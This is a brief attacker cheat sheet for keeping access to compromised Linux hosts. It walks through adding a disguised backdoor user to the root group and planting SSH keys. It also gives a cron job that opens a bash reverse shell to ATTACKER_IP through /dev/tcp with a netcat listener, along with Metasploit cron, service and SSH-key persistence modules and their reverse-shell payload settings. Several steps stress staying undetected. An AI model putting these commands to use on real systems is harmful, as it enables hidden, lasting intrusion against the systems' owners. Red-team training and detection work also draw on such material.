Establishing Persistence On Linux

In most cases root privileges are required to establish persistence on linux.

Creating a backdoor user

shell
/bin/bash -i

# Create a new user, try to use a name that appears a legitimate service
useradd -m ftp -s /bin/bash
passwd ftp

# Provide the created user with administrator privileges
usermod -aG root ftp

Persistence Via SSH Keys

Possible options: - Check if the target contains any private key that can be used to log in by SSH. (Don't forget to grant required permissions to the private key: chmod 400 PRIV_KEY) - Generate a key pair and send the public key to the server and use the private key to log into the target.

# Log in with a private key
ssh -i PRIVATE_KEY_NAME USER@TARGET

Persistence Via SSH Keys Using Metasploit Modules

post/linux/manage/sshkey_persistence

It is very useful, since it is not easy to detect.

use post/linux/manage/sshkey_persistence
set SESSION SESSION_IDs
set CREATESSHFOLDER true
run

Persistence Via Cron Jobs

After compromising a target, we will create a cron job that executes a bash reverse shell command, that will connect to our netcat listener.

# Enumerate cron jobs
cat /etc/cron*

# Create cron file
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'" > cron

# Add cron to cronjob
crontab -i cron

# List cronjobs
crontab -l

# Set up netcat
nc -nvlp ATTACKER_PORT

Persistence Via Cron Jobs Using Metasploit

exploit/linux/local/cron_persistence

use exploit/linux/local/cron_persistence
set SESSION SESSION_ID
run

Persistence Via Service

Persistence Via Service Using Metasploit

exploit/linux/local/service_persistence

use exploit/linux/local/service_persistence
set SESSION SESSION_ID
set payload cmd/unix/reverse_python
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run